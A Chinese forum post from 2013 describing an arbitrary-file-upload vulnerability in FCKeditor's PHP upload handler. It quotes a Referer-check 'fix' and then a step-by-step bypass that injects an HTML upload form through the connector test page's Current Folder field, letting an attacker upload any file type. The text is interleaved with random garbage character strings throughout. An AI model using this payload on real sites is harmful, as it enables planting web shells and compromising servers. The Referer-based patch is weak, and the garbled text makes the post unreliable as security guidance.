漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
0 V8 I/ E3 M* o网上给出的修复方案是9 M0 x \6 {, [ j# I& n
修复方法,删除FCK编辑器用其他的编辑器8 Q3 W4 s% b; b/ c
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
U$ Z6 M# w! r! Y( M在
7 I1 I( m! `6 r1 J. F9 w" f3 ~% Drequire(‘config.php’);
% C' s* Y& W& }( v+ s3 r) a; w0 |, _require(‘util.php’);! j- g* p8 r- W9 Z+ P
的下面添加以下代码—————————–
' F( @/ U- k0 q/ t, S! b6 B9 s//防止外部提交
' O, R9 Z4 e; Y; b4 n, N3 sfunction outsidepost()! Z, C0 G' n4 C W1 v
{
6 U/ [2 I: G" b& x- W2 e. B$servername=$_SERVER['SERVER_NAME'];# q5 [0 ]0 M3 Y' i" e3 S
$sub_from=@$_SERVER['HTTP_REFERER'];: W5 ^- E9 Z0 w. I2 Z
$sub_len=strlen($servername);4 x) e0 k* e0 l i' s
$checkfrom=substr($sub_from,7,$sub_len);3 L2 r J- u) ?% A6 l
if($checkfrom!=$servername){; E1 f' A+ @" I- T6 i) g
echo(“you don’t outsidepost!”);6 D) v* Z' ~3 o- V1 f
exit;
( r9 |. V. l" h7 _- j; q4 q}4 g! e9 s+ S& x8 }6 P2 t1 o
}
$ O2 C: a! j+ l, U+ zoutsidepost();* B/ N; r, {3 X) V5 b8 v
防止外部提交,但是没有防止内部提交,/ U. i2 b/ z6 l' H( c
利用方法:: J! k* k. G1 a- c' r: O z
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
# L- o4 a) Q* r! f( P2,在Current Folder 框输入- Z. f. ], I. R& C( \
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
( ?* Q7 x/ }) n; \& J然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。6 C# N+ ]- d6 S; S
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对